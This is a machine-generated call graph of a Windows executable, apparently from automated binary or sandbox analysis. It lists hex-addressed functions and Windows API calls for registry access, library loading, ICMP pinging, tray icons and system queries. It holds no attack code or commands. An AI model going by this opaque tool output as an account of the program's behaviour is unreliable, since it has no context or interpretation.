99997 a94fb8 99996->99997 99998 ad0a54 99996->99998 99999 aa312d _W_store_winword 60 API calls 99997->99999 100000 a955bc 59 API calls 99998->100000 100001 a94fc3 99999->100001 100002 ad0a68 100000->100002 100001->100002 100003 a94fcd 100001->100003 100004 a955bc 59 API calls 100002->100004 100005 aa312d _W_store_winword 60 API calls 100003->100005 100006 ad0a84 100004->100006 100007 a94fd8 100005->100007 100009 aa00cf 61 API calls 100006->100009 100007->100006 100008 a94fe2 100007->100008 100010 aa312d _W_store_winword 60 API calls 100008->100010 100011 ad0aa7 100009->100011 100012 a94fed 100010->100012 100013 a955bc 59 API calls 100011->100013 100014 ad0ad0 100012->100014 100015 a94ff7 100012->100015 100017 ad0ab3 100013->100017 100016 a955bc 59 API calls 100014->100016 100018 a9501b 100015->100018 100021 a91c9c 59 API calls 100015->100021 100019 ad0aee 100016->100019 100020 a91c9c 59 API calls 100017->100020 100022 a847be 59 API calls 100018->100022 100023 a91c9c 59 API calls 100019->100023 100024 ad0ac1 100020->100024 100025 a9500e 100021->100025 100026 a9502a 100022->100026 100027 ad0afc 100023->100027 100028 a955bc 59 API calls 100024->100028 100029 a955bc 59 API calls 100025->100029 100030 a84540 59 API calls 100026->100030 100031 a955bc 59 API calls 100027->100031 100028->100014 100029->100018 100032 a95038 100030->100032 100033 ad0b0b 100031->100033 100137 a843d0 100032->100137 100033->100033 100035 a8477a 59 API calls 100037 a95055 100035->100037 100036 a843d0 59 API calls 100036->100037 100037->100035 100037->100036 100038 a955bc 59 API calls 100037->100038 100039 a9509b Mailbox 100037->100039 100038->100037 100039->99922 100041 a931cc __write_nolock 100040->100041 100042 ad0314 _memset 100041->100042 100043 a931e5 100041->100043 100045 ad0330 GetOpenFileNameW 100042->100045 100044 aa0284 60 API calls 100043->100044 100046 a931ee 100044->100046 100047 ad037f 100045->100047 100157 aa09c5 100046->100157 100049 a91821 59 API calls 100047->100049 100051 ad0394 100049->100051 100051->100051 100053 a93203 100175 a9278a 100053->100175 100095->99934 100105 a9542d __write_nolock 100104->100105 100106 a91821 59 API calls 100105->100106 100116 a95590 Mailbox 100105->100116 100108 a9545f 100106->100108 100107 a91609 59 API calls 100107->100108 100108->100107 100110 a95495 Mailbox 100108->100110 100109 a91609 59 API calls 100109->100110 100110->100109 100111 a95563 100110->100111 100114 a91a36 59 API calls 100110->100114 100110->100116 100146 a94c94 100110->100146 100112 a91a36 59 API calls 100111->100112 100111->100116 100113 a95584 100112->100113 100115 a94c94 59 API calls 100113->100115 100114->100110 100115->100116 100116->99976 100119 aa0fe6 Mailbox 59 API calls 100118->100119 100120 a84787 100119->100120 100120->99983 100122 a955df 100121->100122 100123 a955c6 100121->100123 100125 a91821 59 API calls 100122->100125 100124 a91c9c 59 API calls 100123->100124 100126 a94fa0 100124->100126 100125->100126 100127 aa312d 100126->100127 100128 aa3139 100127->100128 100129 aa31ae 100127->100129 100133 aa315e 100128->100133 100152 aa8d58 58 API calls __getptd_noexit 100128->100152 100154 aa31c0 60 API calls 3 library calls 100129->100154 100132 aa31bb 100132->99996 100133->99996 100134 aa3145 100153 aa8fe6 9 API calls __wtof_l 100134->100153 100136 aa3150 100136->99996 100138 abd6c9 100137->100138 100140 a843e7 100137->100140 100138->100140 100156 a840cb 59 API calls Mailbox 100138->100156 100141 a844e8 100140->100141 100142 a84530 100140->100142 100145 a844ef 100140->100145 100144 aa0fe6 Mailbox 59 API calls 100141->100144 100155 a8523c 59 API calls 100142->100155 100144->100145 100145->100037 100147 a94ca2 100146->100147 100151 a94cc4 _memmove 100146->100151 100149 aa0fe6 Mailbox 59 API calls 100147->100149 100148 aa0fe6 Mailbox 59 API calls 100150 a94cd8 100148->100150 100149->100151 100150->100110 100151->100148 100152->100134 100153->100136 100154->100132 100155->100145 100156->100140 100158 ab1b70 __write_nolock 100157->100158 100159 aa09d2 GetLongPathNameW 100158->100159 100160 a91821 59 API calls 100159->100160 100161 a931f7 100160->100161 100162 a92f3d 100161->100162 100163 a91207 59 API calls 100162->100163 100164 a92f4f 100163->100164 100165 aa0284 60 API calls 100164->100165 100166 a92f5a 100165->100166 100167 ad0177 100166->100167 100168 a92f65 100166->100168 100169 a9151f 61 API calls 100167->100169 100174 ad0191 100167->100174 100170 a94c94 59 API calls 100168->100170 100169->100167 100171 a92f71 100170->100171 100209 a81307 100171->100209 100173 a92f84 Mailbox 100173->100053 100215 a949c2 100175->100215 100178 acf8d6 100179 a949c2 136 API calls 100210 a81319 100209->100210 100214 a81338 _memmove 100209->100214 100212 aa0fe6 Mailbox 59 API calls 100210->100212 100211 aa0fe6 Mailbox 59 API calls 100213 a8134f 100211->100213 100212->100214 100213->100173 100214->100211 100399 a94b29 100215->100399 100220 a949ed LoadLibraryExW 100409 a94ade 100220->100409 100221 ad08bb 100223 a94a2f 84 API calls 100221->100223 100225 ad08c2 100223->100225 100227 a94ade 3 API calls 100225->100227 100229 ad08ca 100227->100229 100228 a94a14 100228->100229 100230 a94a20 100228->100230 100435 a94ab2 100229->100435 100231 a94a2f 84 API calls 100230->100231 100233 a927af 100231->100233 100233->100178 100233->100179 100236 ad08f1 100443 a94a6e 100236->100443 100448 a94b77 100399->100448 100402 a949d4 100406 aa547b 100402->100406 100403 a94b60 FreeLibrary 100403->100402 100404 a94b77 2 API calls 100405 a94b50 100404->100405 100405->100402 100405->100403 100452 aa5490 100406->100452 100408 a949e1 100408->100220 100408->100221 100533 a94baa 100409->100533 100412 a94b03 100414 a94a05 100412->100414 100415 a94b15 FreeLibrary 100412->100415 100413 a94baa 2 API calls 100413->100412 100416 a948b0 100414->100416 100415->100414 100417 aa0fe6 Mailbox 59 API calls 100416->100417 100418 a948c5 100417->100418 100419 a9433f 59 API calls 100418->100419 100420 a948d1 _memmove 100419->100420 100421 a9490c 100420->100421 100422 ad080a 100420->100422 100424 a94a6e 69 API calls 100421->100424 100423 ad0817 100422->100423 100542 ae9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100422->100542 100543 ae9f5e 95 API calls 100423->100543 100428 a94915 100424->100428 100427 a94ab2 74 API calls 100427->100428 100428->100427 100429 ad0859 100428->100429 100432 a949a0 100428->100432 100433 a94a8c 85 API calls 100428->100433 100537 a94a8c 100429->100537 100432->100228 100433->100428 100436 ad0945 100435->100436 100437 a94ac4 100435->100437 100649 aa5802 100437->100649 100440 ae96c4 100774 ae951a 100440->100774 100442 ae96da 100442->100236 100449 a94b44 100448->100449 100450 a94b80 LoadLibraryA 100448->100450 100449->100404 100449->100405 100450->100449 100451 a94b91 GetProcAddress 100450->100451 100451->100449 100453 aa549c __read 100452->100453 100454 aa54af 100453->100454 100457 aa54e0 100453->100457 100501 aa8d58 58 API calls __getptd_noexit 100454->100501 100456 aa54b4 100502 aa8fe6 9 API calls __wtof_l 100456->100502 100471 ab0718 100457->100471 100460 aa54e5 100461 aa54fb 100460->100461 100462 aa54ee 100460->100462 100464 aa5525 100461->100464 100465 aa5505 100461->100465 100503 aa8d58 58 API calls __getptd_noexit 100462->100503 100486 ab0837 100464->100486 100504 aa8d58 58 API calls __getptd_noexit 100465->100504 100466 aa54bf @_EH4_CallFilterFunc@8 __read 100466->100408 100472 ab0724 __read 100471->100472 100473 aa9e3b __lock 58 API calls 100472->100473 100484 ab0732 100473->100484 100474 ab07a6 100506 ab082e 100474->100506 100475 ab07ad 100511 aa8a4d 58 API calls 2 library calls 100475->100511 100478 ab07b4 100478->100474 100512 aaa05b InitializeCriticalSectionAndSpinCount 100478->100512 100479 ab0823 __read 100479->100460 100481 aa9ec3 __mtinitlocknum 58 API calls 100481->100484 100483 ab07da EnterCriticalSection 100483->100474 100484->100474 100484->100475 100484->100481 100509 aa6e7d 59 API calls __lock 100484->100509 100510 aa6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100484->100510 100487 ab0857 __wopenfile 100486->100487 100488 ab0871 100487->100488 100500 ab0a2c 100487->100500 100519 aa39fb 60 API calls 2 library calls 100487->100519 100517 aa8d58 58 API calls __getptd_noexit 100488->100517 100490 ab0876 100518 aa8fe6 9 API calls __wtof_l 100490->100518 100492 aa5530 100505 aa5552 LeaveCriticalSection LeaveCriticalSection _fseek 100492->100505 100493 ab0a8f 100514 ab87d1 100493->100514 100496 ab0a25 100496->100500 100520 aa39fb 60 API calls 2 library calls 100496->100520 100498 ab0a44 100498->100500 100521 aa39fb 60 API calls 2 library calls 100498->100521 100500->100488 100500->100493 100501->100456 100502->100466 100503->100466 100504->100466 100505->100466 100513 aa9fa5 LeaveCriticalSection 100506->100513 100508 ab0835 100508->100479 100509->100484 100510->100484 100511->100478 100512->100483 100513->100508 100522 ab7fb5 100514->100522 100516 ab87ea 100516->100492 100517->100490 100518->100492 100519->100496 100520->100498 100521->100500 100525 ab7fc1 __read 100522->100525 100523 ab7fd7 100524 aa8d58 __wtof_l 58 API calls 100523->100524 100526 ab7fdc 100524->100526 100525->100523 100527 ab800d 100525->100527 100528 aa8fe6 __wtof_l 9 API calls 100526->100528 100529 ab807e __wsopen_nolock 109 API calls 100527->100529 100532 ab7fe6 __read 100528->100532 100530 ab8029 100529->100530 100531 ab8052 __wsopen_helper LeaveCriticalSection 100530->100531 100531->100532 100532->100516 100534 a94af7 100533->100534 100535 a94bb3 LoadLibraryA 100533->100535 100534->100412 100534->100413 100535->100534 100536 a94bc4 GetProcAddress 100535->100536 100536->100534 100538 a94a9b 100537->100538 100539 ad0923 100537->100539 100544 aa5a6d 100538->100544 100542->100423 100543->100428 100545 aa5a79 __read 100544->100545 100546 aa5a8b 100545->100546 100548 aa5ab1 100545->100548 100652 aa581d 100649->100652 100651 a94ad5 100651->100440 100653 aa5829 __read 100652->100653 100654 aa586c 100653->100654 100656 aa583f _memset 100653->100656 100664 aa5864 __read 100653->100664 100655 aa6e3e __lock_file 59 API calls 100654->100655 100657 aa5872 100655->100657 100679 aa8d58 58 API calls __getptd_noexit 100656->100679 100665 aa563d 100657->100665 100659 aa5859 100680 aa8fe6 9 API calls __wtof_l 100659->100680 100664->100651 100666 aa5673 100665->100666 100670 aa5658 _memset 100665->100670 100681 aa58a6 LeaveCriticalSection LeaveCriticalSection _fseek 100666->100681 100667 aa5663 100770 aa8d58 58 API calls __getptd_noexit 100667->100770 100669 aa5668 100771 aa8fe6 9 API calls __wtof_l 100669->100771 100670->100666 100670->100667 100676 aa56b3 100670->100676 100673 aa57c4 _memset 100773 aa8d58 58 API calls __getptd_noexit 100673->100773 100674 aa4906 __output_l 58 API calls 100674->100676 100676->100666 100676->100673 100676->100674 100682 ab108b 100676->100682 100750 ab0dd7 100676->100750 100772 ab0ef8 58 API calls 3 library calls 100676->100772 100679->100659 100680->100664 100681->100664 100683 ab10ac 100682->100683 100684 ab10c3 100682->100684 100685 aa8d24 __write_nolock 58 API calls 100683->100685 100686 ab17fb 100684->100686 100690 ab10fd 100684->100690 100687 ab10b1 100685->100687 100692 ab1105 100690->100692 100698 ab111c 100690->100698 100751 ab0de2 100750->100751 100756 ab0df7 100750->100756 100752 aa8d58 __wtof_l 58 API calls 100751->100752 100753 ab0de7 100752->100753 100755 ab0e2c 100758 aa4906 __output_l 58 API calls 100755->100758 100756->100755 100757 ab6214 __getbuf 58 API calls 100756->100757 100764 ab0df2 100756->100764 100757->100755 100764->100676 100770->100669 100771->100666 100772->100676 100773->100669 100777 aa542a GetSystemTimeAsFileTime 100774->100777 100776 ae9529 100776->100442 100778 aa5458 __aulldiv 100777->100778 100778->100776 101002 a86981 101003 a8373a 59 API calls 101002->101003 101004 a86997 101003->101004 101009 a87b3f 101004->101009 101006 a869bf 101007 a8584d 101006->101007 101021 aea48d 89 API calls 4 library calls 101006->101021 101010 a9162d 59 API calls 101009->101010 101012 a87b64 _wcscmp 101010->101012 101011 a87b98 Mailbox 101011->101006 101012->101011 101013 a91a36 59 API calls 101012->101013 101014 abffad 101013->101014 101015 a917e0 59 API calls 101014->101015 101016 abffb8 101015->101016 101022 a83938 68 API calls 101016->101022 101018 abffc9 101020 abffcd Mailbox 101018->101020 101023 a8523c 59 API calls 101018->101023 101020->101006 101021->101007 101022->101018 101023->101020 101024 a94d83 101025 a94dba 101024->101025 101026 a94dd8 101025->101026 101027 a94e37 101025->101027 101063 a94e35 101025->101063 101031 a94ead PostQuitMessage 101026->101031 101032 a94de5 101026->101032 101029 a94e3d 101027->101029 101030 ad09c2 101027->101030 101028 a94e1a DefWindowProcW 101066 a94e28 101028->101066 101033 a94e42 101029->101033 101034 a94e65 SetTimer RegisterWindowMessageW 101029->101034 101079 a8c460 10 API calls Mailbox 101030->101079 101031->101066 101035 ad0a35 101032->101035 101036 a94df0 101032->101036 101038 a94e49 KillTimer 101033->101038 101039 ad0965 101033->101039 101040 a94e8e CreatePopupMenu 101034->101040 101034->101066 101082 ae2cce 97 API calls _memset 101035->101082 101041 a94df8 101036->101041 101042 a94eb7 101036->101042 101048 a95ac3 Shell_NotifyIconW 101038->101048 101046 ad099e MoveWindow 101039->101046 101047 ad096a 101039->101047 101040->101066 101049 a94e03 101041->101049 101054 ad0a1a 101041->101054 101069 a95b29 101042->101069 101044 ad09e9 101080 a8c483 316 API calls Mailbox 101044->101080 101046->101066 101051 ad098d SetFocus 101047->101051 101052 ad096e 101047->101052 101053 a94e5c 101048->101053 101055 a94e9b 101049->101055 101056 a94e0e 101049->101056 101051->101066 101052->101056 101058 ad0977 101052->101058 101076 a834e4 DeleteObject DestroyWindow Mailbox 101053->101076 101054->101028 101081 ad8854 59 API calls Mailbox 101054->101081 101077 a95bd7 107 API calls _memset 101055->101077 101056->101028 101065 a95ac3 Shell_NotifyIconW 101056->101065 101057 ad0a47 101057->101028 101057->101066 101078 a8c460 10 API calls Mailbox 101058->101078 101063->101028 101064 a94eab 101064->101066 101067 ad0a0e 101065->101067 101068 a959d3 94 API calls 101067->101068 101068->101063 101070 a95b40 _memset 101069->101070 101071 a95bc2 101069->101071 101072 a956f8 87 API calls 101070->101072 101071->101066 101075 a95b67 101072->101075 101073 a95bab KillTimer SetTimer 101073->101071 101074 ad0d6e Shell_NotifyIconW 101074->101073 101075->101073 101075->101074 101076->101066 101077->101064 101078->101066 101079->101044 101080->101056 101081->101063 101082->101057 101083 a81066 101088 a8aaaa 101083->101088 101085 a8106c 101086 aa2f70 __cinit 67 API calls 101085->101086 101087 a81076 101086->101087 101089 a8aacb 101088->101089 101121 aa02eb 101089->101121 101093 a8ab12 101094 a91207 59 API calls 101093->101094 101095 a8ab1c 101094->101095 101096 a91207 59 API calls 101095->101096 101097 a8ab26 101096->101097 101098 a91207 59 API calls 101097->101098 101099 a8ab30 101098->101099 101100 a91207 59 API calls 101099->101100 101101 a8ab6e 101100->101101 101102 a91207 59 API calls 101101->101102 101103 a8ac39 101102->101103 101131 aa0588 101103->101131 101107 a8ac6b 101108 a91207 59 API calls 101107->101108 101109 a8ac75 101108->101109 101159 a9fe2b 101109->101159 101111 a8acbc 101112 a8accc GetStdHandle 101111->101112 101113 a8ad18 101112->101113 101114 ac2f39 101112->101114 101115 a8ad20 OleInitialize 101113->101115 101114->101113 101116 ac2f42 101114->101116 101115->101085 101166 ae70f3 64 API calls Mailbox 101116->101166 101118 ac2f49 101167 ae77c2 CreateThread 101118->101167 101120 ac2f55 CloseHandle 101120->101115 101168 aa03c4 101121->101168 101124 aa03c4 59 API calls 101125 aa032d 101124->101125 101126 a91207 59 API calls 101125->101126 101127 aa0339 101126->101127 101128 a91821 59 API calls 101127->101128 101129 a8aad1 101128->101129 101130 aa07bb 6 API calls 101129->101130 101130->101093 101132 a91207 59 API calls 101131->101132 101133 aa0598 101132->101133 101134 a91207 59 API calls 101133->101134 101135 aa05a0 101134->101135 101175 a910c3 101135->101175 101138 a910c3 59 API calls 101139 aa05b0 101138->101139 101140 a91207 59 API calls 101139->101140 101141 aa05bb 101140->101141 101142 aa0fe6 Mailbox 59 API calls 101141->101142 101143 a8ac43 101142->101143 101144 a9ff4c 101143->101144 101145 a9ff5a 101144->101145 101146 a91207 59 API calls 101145->101146 101147 a9ff65 101146->101147 101148 a91207 59 API calls 101147->101148 101149 a9ff70 101148->101149 101150 a91207 59 API calls 101149->101150 101151 a9ff7b 101150->101151 101152 a91207 59 API calls 101151->101152 101153 a9ff86 101152->101153 101154 a910c3 59 API calls 101153->101154 101155 a9ff91 101154->101155 101156 aa0fe6 Mailbox 59 API calls 101155->101156 101157 a9ff98 RegisterWindowMessageW 101156->101157 101157->101107 101160 ad620c 101159->101160 101161 a9fe3b 101159->101161 101178 aea12a 59 API calls 101160->101178 101162 aa0fe6 Mailbox 59 API calls 101161->101162 101165 a9fe43 101162->101165 101164 ad6217 101165->101111 101166->101118 101167->101120 101179 ae77a8 65 API calls 101167->101179 101169 a91207 59 API calls 101168->101169 101170 aa03cf 101169->101170 101171 a91207 59 API calls 101170->101171 101172 aa03d7 101171->101172 101173 a91207 59 API calls 101172->101173 101174 aa0323 101173->101174 101174->101124 101176 a91207 59 API calls 101175->101176 101177 a910cb 101176->101177 101177->101138 101178->101164 101180 ac01f8 101181 ac01fa 101180->101181 101184 ae4d18 SHGetFolderPathW 101181->101184 101185 a91821 59 API calls 101184->101185 101186 ac0203 101185->101186 101187 a8107d 101192 a92fc5 101187->101192 101189 a8108c 101190 aa2f70 __cinit 67 API calls 101189->101190 101191 a81096 101190->101191 101193 a92fd5 __write_nolock 101192->101193 101194 a91207 59 API calls 101193->101194 101195 a9308b 101194->101195 101196 aa00cf 61 API calls 101195->101196 101197 a93094 101196->101197 101223 aa08c1 101197->101223 101200 a91900 59 API calls 101201 a930ad 101200->101201 101202 a94c94 59 API calls 101201->101202 101203 a930bc 101202->101203 101204 a91207 59 API calls 101203->101204 101205 a930c5 101204->101205 101206 a919e1 59 API calls 101205->101206 101207 a930ce RegOpenKeyExW 101206->101207 101208 ad01a3 RegQueryValueExW 101207->101208 101212 a930f0 Mailbox 101207->101212 101209 ad0235 RegCloseKey 101208->101209 101210 ad01c0 101208->101210 101209->101212 101222 ad0247 _wcscat Mailbox __wsetenvp 101209->101222 101211 aa0fe6 Mailbox 59 API calls 101210->101211 101213 ad01d9 101211->101213 101212->101189 101215 a9433f 59 API calls 101213->101215 101214 a91609 59 API calls 101214->101222 101216 ad01e4 RegQueryValueExW 101215->101216 101217 ad0201 101216->101217 101219 ad021b 101216->101219 101218 a91821 59 API calls 101217->101218 101218->101219 101219->101209 101220 a91a36 59 API calls 101220->101222 101221 a94c94 59 API calls 101221->101222 101222->101212 101222->101214 101222->101220 101222->101221 101224 ab1b70 __write_nolock 101223->101224 101225 aa08ce GetFullPathNameW 101224->101225 101226 aa08f0 101225->101226 101227 a91821 59 API calls 101226->101227 101228 a9309f 101227->101228 101228->101200 101229 a81055 101234 a82a19 101229->101234 101232 aa2f70 __cinit 67 API calls 101233 a81064 101232->101233 101235 a91207 59 API calls 101234->101235 101236 a82a87 101235->101236 101241 a81256 101236->101241 101239 a82b24 101240 a8105a 101239->101240 101244 a813f8 59 API calls 2 library calls 101239->101244 101240->101232 101245 a81284 101241->101245 101244->101239 101246 a81291 101245->101246 101247 a81275 101245->101247 101246->101247 101248 a81298 RegOpenKeyExW 101246->101248 101247->101239 101248->101247 101249 a812b2 RegQueryValueExW 101248->101249 101250 a812e8 RegCloseKey 101249->101250 101251 a812d3 101249->101251 101250->101247 101251->101250 101252 a85ff5 101266 a85ede Mailbox _memmove 101252->101266 101253 aa0fe6 59 API calls Mailbox 101253->101266 101254 a86a9b 101458 a8a9de 316 API calls 101254->101458 101255 a853b0 316 API calls 101255->101266 101257 abeff9 101470 a85190 59 API calls Mailbox 101257->101470 101258 a86abc 101468 aea48d 89 API calls 4 library calls 101258->101468 101260 abf007 101471 aea48d 89 API calls 4 library calls 101260->101471 101263 abefeb 101309 a85569 Mailbox 101263->101309 101469 ad6cf1 59 API calls Mailbox 101263->101469 101265 a860e5 101265->101258 101267 abe137 101265->101267 101276 a863bd Mailbox 101265->101276 101296 a86152 Mailbox 101265->101296 101266->101253 101266->101254 101266->101255 101266->101257 101266->101258 101266->101260 101266->101265 101268 a91c9c 59 API calls 101266->101268 101270 a91a36 59 API calls 101266->101270 101275 afc355 316 API calls 101266->101275 101266->101309 101457 a8523c 59 API calls 101266->101457 101462 ae7f11 59 API calls Mailbox 101266->101462 101463 ad6cf1 59 API calls Mailbox 101266->101463 101267->101276 101459 ad7aad 59 API calls 101267->101459 101268->101266 101270->101266 101271 aa0fe6 Mailbox 59 API calls 101274 a863d1 101271->101274 101274->101258 101277 a863de 101274->101277 101275->101266 101276->101271 101282 a86426 101276->101282 101278 abe172 101277->101278 101279 a86413 101277->101279 101460 afc87c 85 API calls 2 library calls 101278->101460 101279->101282 101308 a85447 Mailbox 101279->101308 101461 afc9c9 95 API calls Mailbox 101282->101461 101285 abe19d 101285->101285 101286 abe691 101465 aea48d 89 API calls 4 library calls 101286->101465 101287 abf165 101473 aea48d 89 API calls 4 library calls 101287->101473 101289 a869fa 101299 a91c9c 59 API calls 101289->101299 101292 aa0fe6 59 API calls Mailbox 101292->101308 101294 a869ff 101294->101286 101294->101287 101295 abe6a0 101296->101258 101296->101263 101297 abe2e9 VariantClear 101296->101297 101296->101309 101317 afe60c 130 API calls 101296->101317 101319 ae412a 3 API calls 101296->101319 101320 aff1b2 91 API calls 101296->101320 101322 ae413a 101296->101322 101325 a8cfd7 101296->101325 101344 af5e1d 101296->101344 101369 a8d679 101296->101369 101409 aed6be 101296->101409 101456 a85190 59 API calls Mailbox 101296->101456 101464 ad7aad 59 API calls 101296->101464 101297->101296 101299->101309 101300 abea9a 101303 a91c9c 59 API calls 101300->101303 101301 a91c9c 59 API calls 101301->101308 101303->101309 101304 a91207 59 API calls 101304->101308 101305 abeb67 101305->101309 101466 ad7aad 59 API calls 101305->101466 101307 ad7aad 59 API calls 101307->101308 101308->101286 101308->101289 101308->101292 101308->101294 101308->101300 101308->101301 101308->101304 101308->101305 101308->101307 101308->101309 101310 aa2f70 67 API calls __cinit 101308->101310 101311 abef28 101308->101311 101313 a85a1a 101308->101313 101454 a87e50 316 API calls 2 library calls 101308->101454 101455 a86e30 60 API calls Mailbox 101308->101455 101310->101308 101467 aea48d 89 API calls 4 library calls 101311->101467 101472 aea48d 89 API calls 4 library calls 101313->101472 101317->101296 101319->101296 101320->101296 101323 ae494a 3 API calls 101322->101323 101324 ae413f 101323->101324 101324->101296 101326 a84d37 84 API calls 101325->101326 101327 a8d001 101326->101327 101328 a85278 59 API calls 101327->101328 101329 a8d018 101328->101329 101330 a8d57b 101329->101330 101331 a8502b 59 API calls 101329->101331 101336 a8d439 Mailbox __wsetenvp 101329->101336 101330->101296 101331->101336 101332 aa312d _W_store_winword 60 API calls 101332->101336 101333 a9162d 59 API calls 101333->101336 101334 a84f98 59 API calls 101334->101336 101335 aa0c65 62 API calls 101335->101336 101336->101330 101336->101332 101336->101333 101336->101334 101336->101335 101339 a84d37 84 API calls 101336->101339 101340 a91821 59 API calls 101336->101340 101341 a959d3 94 API calls 101336->101341 101342 a95ac3 Shell_NotifyIconW 101336->101342 101343 a8502b 59 API calls 101336->101343 101474 a9153b 59 API calls 2 library calls 101336->101474 101475 a84f3c 59 API calls Mailbox 101336->101475 101339->101336 101340->101336 101341->101336 101342->101336 101343->101336 101345 af5e46 101344->101345 101346 af5e74 WSAStartup 101345->101346 101348 a8502b 59 API calls 101345->101348 101347 af5e9d 101346->101347 101359 af5e88 Mailbox 101346->101359 101350 a940cd 59 API calls 101347->101350 101349 af5e61 101348->101349 101349->101346 101352 a8502b 59 API calls 101349->101352 101351 af5ea6 101350->101351 101353 a84d37 84 API calls 101351->101353 101354 af5e70 101352->101354 101355 af5eb2 101353->101355 101354->101346 101356 a9402a 61 API calls 101355->101356 101357 af5ebf inet_addr gethostbyname 101356->101357 101358 af5edd IcmpCreateFile 101357->101358 101357->101359 101358->101359 101360 af5f01 101358->101360 101359->101296 101361 aa0fe6 Mailbox 59 API calls 101360->101361 101362 af5f1a 101361->101362 101363 a9433f 59 API calls 101362->101363 101364 af5f25 101363->101364 101365 af5f55 IcmpSendEcho 101364->101365 101366 af5f34 IcmpSendEcho 101364->101366 101367 af5f6d 101365->101367 101366->101367 101368 af5fd4 IcmpCloseHandle WSACleanup 101367->101368 101368->101359 101476 a84f98 101369->101476 101373 aa0fe6 Mailbox 59 API calls 101374 a8d6aa 101373->101374 101377 a8d6ba 101374->101377 101503 a93df7 60 API calls Mailbox 101374->101503 101375 a8d6df 101381 a8502b 59 API calls 101375->101381 101385 a8d6ec 101375->101385 101376 ac5068 101376->101375 101508 aefbb7 59 API calls 101376->101508 101379 a84d37 84 API calls 101377->101379 101380 a8d6c8 101379->101380 101382 a93e47 67 API calls 101380->101382 101383 ac50b0 101381->101383 101384 a8d6d7 101382->101384 101383->101385 101386 ac50b8 101383->101386 101384->101375 101384->101376 101507 a93f0b CloseHandle 101384->101507 101489 a941d6 101385->101489 101388 a8502b 59 API calls 101386->101388 101390 a8d6f3 101388->101390 101391 a8d70d 101390->101391 101392 ac50ca 101390->101392 101394 a91207 59 API calls 101391->101394 101393 aa0fe6 Mailbox 59 API calls 101392->101393 101395 ac50d0 101393->101395 101396 a8d715 101394->101396 101397 ac50e4 101395->101397 101400 a93ea1 2 API calls 101395->101400 101504 a93b7b 65 API calls Mailbox 101396->101504 101403 ac50e8 _memmove 101397->101403 101494 ae7c7f 101397->101494 101399 a8d724 101399->101403 101505 a84f3c 59 API calls Mailbox 101399->101505 101400->101397 101404 a8d738 Mailbox 101405 a8d772 101404->101405 101406 a942cf CloseHandle 101404->101406 101405->101296 101407 a8d766 101406->101407 101407->101405 101506 a93f0b CloseHandle 101407->101506 101410 aed6e8 101409->101410 101411 aed6dd 101409->101411 101415 a91207 59 API calls 101410->101415 101452 aed7c2 Mailbox 101410->101452 101412 a8502b 59 API calls 101411->101412 101412->101410 101413 aa0fe6 Mailbox 59 API calls 101414 aed80b 101413->101414 101417 aed817 101414->101417 101509 a93df7 60 API calls Mailbox 101414->101509 101416 aed70c 101415->101416 101418 a91207 59 API calls 101416->101418 101420 a84d37 84 API calls 101417->101420 101421 aed715 101418->101421 101422 aed82f 101420->101422 101423 a84d37 84 API calls 101421->101423 101424 a93e47 67 API calls 101422->101424 101425 aed721 101423->101425 101426 aed83e 101424->101426 101427 aa0119 59 API calls 101425->101427 101428 aed876 101426->101428 101429 aed842 GetLastError 101426->101429 101430 aed736 101427->101430 101433 aed8d8 101428->101433 101434 aed8a1 101428->101434 101431 aed85b 101429->101431 101432 a917e0 59 API calls 101430->101432 101437 aed7cb Mailbox 101431->101437 101510 a93f0b CloseHandle 101431->101510 101435 aed769 101432->101435 101438 aa0fe6 Mailbox 59 API calls 101433->101438 101436 aa0fe6 Mailbox 59 API calls 101434->101436 101442 ae412a 3 API calls 101435->101442 101453 aed793 Mailbox 101435->101453 101439 aed8a6 101436->101439 101437->101296 101443 aed8dd 101438->101443 101444 aed8b7 101439->101444 101446 a91207 59 API calls 101439->101446 101441 a8502b 59 API calls 101441->101452 101445 aed779 101442->101445 101443->101437 101447 a91207 59 API calls 101443->101447 101511 aefc0d 59 API calls 2 library calls 101444->101511 101449 a91a36 59 API calls 101445->101449 101445->101453 101446->101444 101447->101437 101450 aed78a 101449->101450 101451 ae3f1d 63 API calls 101450->101451 101451->101453 101452->101413 101452->101437 101453->101441 101454->101308 101455->101308 101456->101296 101457->101266 101458->101258 101459->101276 101460->101282 101461->101285 101462->101266 101463->101266 101464->101296 101465->101295 101466->101309 101467->101313 101468->101263 101469->101309 101470->101263 101471->101263 101472->101309 101473->101309 101474->101336 101475->101336 101477 abdd2b 101476->101477 101478 a84fa8 101476->101478 101479 abdd3c 101477->101479 101480 a91821 59 API calls 101477->101480 101483 aa0fe6 Mailbox 59 API calls 101478->101483 101481 a919e1 59 API calls 101479->101481 101480->101479 101482 abdd46 101481->101482 101487 a84fd4 101482->101487 101488 a91207 59 API calls 101482->101488 101484 a84fbb 101483->101484 101484->101482 101485 a84fc6 101484->101485 101486 a91a36 59 API calls 101485->101486 101485->101487 101486->101487 101487->101373 101487->101376 101488->101487 101490 a9410a 2 API calls 101489->101490 101491 a941f7 101490->101491 101492 a9410a 2 API calls 101491->101492 101493 a9420b 101492->101493 101493->101390 101495 ae7c8a 101494->101495 101496 aa0fe6 Mailbox 59 API calls 101495->101496 101497 ae7c91 101496->101497 101498 ae7cbe 101497->101498 101499 ae7c9d 101497->101499 101500 aa0fe6 Mailbox 59 API calls 101498->101500 101501 aa0fe6 Mailbox 59 API calls 101499->101501 101502 ae7ca6 _memset 101500->101502 101501->101502 101502->101403 101503->101377 101504->101399 101505->101404 101506->101405 101507->101376 101508->101376 101509->101417 101510->101437 101511->101437 101512 a81016 101517 a95ce7 101512->101517 101515 aa2f70 __cinit 67 API calls 101516 a81025 101515->101516 101518 aa0fe6 Mailbox 59 API calls 101517->101518 101519 a95cef 101518->101519 101520 a8101b 101519->101520 101524 a95f39 101519->101524 101520->101515 101525 a95f42 101524->101525 101526 a95cfb 101524->101526 101527 aa2f70 __cinit 67 API calls 101525->101527 101528 a95d13 101526->101528 101527->101526 101529 a91207 59 API calls 101528->101529 101530 a95d2b GetVersionExW 101529->101530 101531 a91821 59 API calls 101530->101531 101532 a95d6e 101531->101532 101533 a91981 59 API calls 101532->101533 101544 a95d9b 101532->101544 101534 a95d8f 101533->101534 101535 a9133d 59 API calls 101534->101535 101535->101544 101536 a95e00 GetCurrentProcess IsWow64Process 101537 a95e19 101536->101537 101539 a95e98 GetSystemInfo 101537->101539 101540 a95e2f 101537->101540 101538 ad1098 101541 a95e65 101539->101541 101552 a955f0 101540->101552 101541->101520 101544->101536 101544->101538 101545 a95e8c GetSystemInfo 101548 a95e56 